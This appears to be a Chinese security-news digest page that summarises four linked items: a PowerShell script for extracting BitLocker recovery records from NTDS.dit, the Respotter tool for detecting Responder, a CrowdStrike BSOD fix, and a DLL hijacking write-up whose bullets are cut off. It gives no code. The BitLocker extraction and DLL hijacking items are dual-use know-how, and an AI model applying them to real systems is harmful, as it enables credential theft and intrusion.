	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 提取NTDS文件中BitLocker密码的脚本</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页提供了一个PowerShell脚本，用于从Windows的NTDS.dit文件中提取BitLocker密码恢复相关的记录。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OolutfjXMg0QKzaMq6HUSDic4YticXwIW00lzic9Zac8okwHaSIXwrIpiavg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OolutfjXMg0QKzaMq6HUSDic4YticXwIW00lzic9Zac8okwHaSIXwrIpiavg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855412144148841"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">脚本的目的 是为了帮助管理员或者安全分析师在需要时能够从NTDS.dit文件中提取BitLocker的密码恢复信息。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">脚本的操作 包括验证NTDS文件的完整性，加载必要的程序集，附加和打开数据库，获取和检查数据表列，遍历记录以提取相关数据，以及最终的清理工作（关闭数据库连接）。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">脚本的输出 是一个包含BitLocker密码恢复信息的数组，可以通过命令行输出或者图形界面展示。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">脚本的版本 是20210828.01，表明它是在2021年8月28日发布的，并且在初始版本后进行了优化，移除了冗余的程序集。</section></li></ul>
	<br/>
	<p>🏷️: PowerShell, BitLocker, 数据安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 Respotter：网络Responder实例检测工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Respotter 是一个用于检测网络中活跃的 Responder 实例的应用程序，它通过监听 LLMNR、mDNS 和 NBNS 协议的请求来发现可能存在的 Responder 实例，并支持将警报通过 Webhook 发送到 Slack、Teams 或 Discord，也可以将事件发送到 Syslog 服务器。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoKibicp2kFMDbZ6zCeOzOdraQIHAjwflTYaXmt9T3Oed46icRPPURfnU2g/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoKibicp2kFMDbZ6zCeOzOdraQIHAjwflTYaXmt9T3Oed46icRPPURfnU2g/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855412144144141"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Respotter 利用 Responder 的特性检测网络中的潜在威胁：通过监听特定协议的请求，Respotter 能够发现网络中的 Responder 实例，这对于网络安全是一个重要的检测手段。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">集成了多种警报机制：Respotter 支持将警报发送到 Slack、Teams、Discord 或 Syslog 服务器，这有助于及时通知团队成员或将事件整合到安全监控系统中。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">考虑到通知的平衡：为了避免通知滥发，Respotter 对警报进行了速率限制，确保通知的有效性和重要性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全运营的考量：Respotter 不会进行响应毒化，这是出于对操作安全（opsec）的考虑，避免对网络中的其他客户端造成干扰或问题。</section></li></ul>
	<br/>
	<p>🏷️: 网络检测, Responder, 警报系统, Webhook</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 使用组策略在安全模式下自动修复CrowdStrike导致的蓝屏问题</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页提供了一个PowerShell脚本解决方案，用于在Windows系统中自动删除导致蓝屏（BSOD）的CrowdStrike驱动程序文件，并在修复后取消Safe Mode启动。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OorS4dYAJlbUZI6nANDt8VGl4lRtibt2ciaRg18qPEaKEenPGSlbQRXmKQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OorS4dYAJlbUZI6nANDt8VGl4lRtibt2ciaRg18qPEaKEenPGSlbQRXmKQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844215122114588"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">自动化解决方案：提供的PowerShell脚本实现了自动化删除问题驱动程序文件的功能，减少了手动操作的复杂性和时间消耗。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全模式操作：脚本包括了在Safe Mode下操作的逻辑，确保在系统无法正常启动时也能执行修复。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">错误处理：脚本中包含了异常处理，能够捕获删除文件过程中可能出现的错误并输出相应的信息。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">系统恢复：脚本在完成修复后，会自动移除Safe Mode启动选项，确保系统在下次启动时恢复到正常模式。</section></li></ul>
	<br/>
	<p>🏷️: PowerShell, CrowdStrike, 蓝屏, 安全模式, 组策略</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 自适应DLL劫持攻击技术HADESS解析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了DLL劫持攻击技术，包括其原理、技术变体、防御策略以及相关工具的使用。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoVbHBUJ8SsrfKicLyFwOF3iaS5OP6ZxWibxphYUQvPiaImWyzFgOcibD4GgQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoVbHBUJ8SsrfKicLyFwOF3iaS5OP6ZxWibxphYUQvPiaImWyzFgOcibD4GgQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855412144112452"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
